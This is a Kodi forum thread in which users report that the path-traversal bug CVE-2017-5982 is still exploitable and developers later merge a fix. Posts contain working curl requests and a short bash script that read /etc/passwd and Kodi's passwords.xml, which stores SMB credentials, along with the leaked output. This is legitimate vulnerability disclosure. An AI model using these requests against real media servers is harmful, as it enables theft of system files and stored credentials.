Kodi Community Forum
Local File Include (CVE-2017-5982) is back - Printable Version

+- Kodi Community Forum (https://forum.kodi.tv)
+-- Forum: Support (https://forum.kodi.tv/forumdisplay.php?fid=33)
+--- Forum: General Support (https://forum.kodi.tv/forumdisplay.php?fid=111)
+---- Forum: OS independent / Other (https://forum.kodi.tv/forumdisplay.php?fid=228)
+---- Thread: Local File Include (CVE-2017-5982) is back (/showthread.php?tid=335695)



Local File Include (CVE-2017-5982) is back - starwarsfan - 2018-09-20

I believe the Local File Include (CVE-2017-5982) is back.

I know that bool CFileUtils::ZebraListAccessCheck(const std:Confusedtring &filePath) from xbmc/xbmc/utils/FileUtils.cpp is supposed to block access, it doesn't.

The code from: 
https://www.exploit-db.com/exploits/41312/

Still works on:
NOTICE: Starting Kodi (17.6). Platform: Linux ARM (Thumb) 32-bit
NOTICE: Using Release Kodi x32 build (version for Raspberry Pi)
Kodi compiled Jun  7 2018 by GCC 6.3.0 for Linux ARM (Thumb) 32-bit version 4.9.30 (264478)


http://pi/image/image%3A%2F%2F%2e%2e%252fhome%252fosmc%252f.kodi%252fuserdata%252fpasswords.xml
<passwords> <path> <from pathversion="1">smb://smb/media</from> <to pathversion="1">smb://username:password@smb/media/</to> </path> </passwords>


RE: Local File Include (CVE-2017-5982) is back - popcornmix - 2018-09-21

Can you test a Kodi 18 nightly build? There have been no changes to Kodi 17 for many months.


RE: Local File Include (CVE-2017-5982) is back - starwarsfan - 2018-09-21

I will test tonight.


RE: Local File Include (CVE-2017-5982) is back - Sam.Nazarko - 2018-09-21

You can grab a nightly here: https://discourse.osmc.tv/t/testing-kodi-18-leia-builds-for-raspberry-pi/20631 if you wish to test with OSMC still for consistency.


RE: Local File Include (CVE-2017-5982) is back - starwarsfan - 2018-09-22

On OSMC it still exists, 
22:31:01.228 T:1918357504  NOTICE: Starting Kodi (18.0-BETA3). Platform: Linux ARM (Thumb) 32-bit
22:31:01.229 T:1918357504  NOTICE: Using Release Kodi x32 build (version for Raspberry Pi)
22:31:01.229 T:1918357504  NOTICE: Kodi compiled Sep 20 2018 by GCC 6.3.0 for Linux ARM (Thumb) 32-bit version 4.9.30 (264478)

curl http://kodi/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3Confusedys:/dev:/usr/sbin/nologin
sync:x:4:65534Confusedync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
systemd-timesync:x:101:102Confusedystemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:102:103Confusedystemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:103:104Confusedystemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:104:105Confusedystemd Bus Proxy,,,:/run/systemd:/bin/false
ntp:x:105:107::/home/ntp:/bin/false
messagebus:x:106:108::/var/run/dbus:/bin/false
statd:x:107:65534::/var/lib/nfs:/bin/false
avahi:x:108:110:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
osmc:x:1000:1000::/home/osmc:/bin/bash


RE: Local File Include (CVE-2017-5982) is back - starwarsfan - 2018-09-22

I did a test on a "plain" Kodi 18.0-BETA3 Git:2018921-a2133e4 running on Ubuntu 18.04.1 LTS (kernel: Linux 4.15.0-34-generic) and did not see the vulnerability.

curl http://kodi:8080/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd
<html><head><title>File not found</title></head><body>File not found</body></html>

Unless it was fixed between 18.0-BETA3 compiled Sep 20 2018 and 8.0-BETA3 Git:2018921-a2133e4, I will check with OSMC to see what they are adding that is causing the vulnerability to be seen.


RE: Local File Include (CVE-2017-5982) is back - Sam.Nazarko - 2018-09-22

We haven't got any patches here that should introduce this vulnerability.
Try with a file in the Ubuntu user's home folder' as /etc/passwd may simply be inaccessible if running as an unprivileged user.


RE: Local File Include (CVE-2017-5982) is back - starwarsfan - 2018-09-24

@Sam.Nazarko 

The bigger issue is this one:

curl http://kodi/image/image%3A%2F%2F%2e%2e%252fhome%252fosmc%252f.kodi%252fuserdata%252fpasswords.xml
<passwords>
    <path>
        <from pathversion="1">smb://smb/media</from>
        <to pathversion="1">smb://smbuser:password@smb/media/Pictures/</to>
    </path>
</passwords>


I replaced my server name with "smb," the user with "smbuser", and the password with "password" because I'm not posting those on the site Smile


RE: Local File Include (CVE-2017-5982) is back - Milhouse - 2018-09-24

This issue has never been fixed to my knowledge, and affects all platforms and not just OSMC.

Ubuntu with latest Kodi 18 *is* vulnerable.

Test script ("kvuln"):
text:

#!/bin/bash

HOST="$1"
XPATH="$2"
XPATH="${XPATH//\//%2F}"
XPATH="${XPATH//%/%25}"

curl -s "http://${HOST}/image/image%3A%2F%2F..${BASE}${XPATH}"

text:

neil@nm-linux:~/projects$ uname -a
Linux nm-linux 4.13.0-46-generic #51-Ubuntu SMP Tue Jun 12 12:36:29 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
neil@nm-linux:~/projects$ /freenas/data/kvuln localhost:8080 /../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...

special://envhome is /home/neil, and paths to be exploited are relative to that root.

An attempt to fix CVE-2017-5982 was proposed but never implemented: https://github.com/xbmc/xbmc/pull/11851

If anything else in this area has been implemented (can't find anything) then it is now a regression.

I'll move this thread to OS Independent/Other.


RE: Local File Include (CVE-2017-5982) is back - yol - 2018-10-03

Fix is underway

https://github.com/xbmc/xbmc/pull/14501


RE: Local File Include (CVE-2017-5982) is back - yol - 2018-10-14

fyi: Fix merged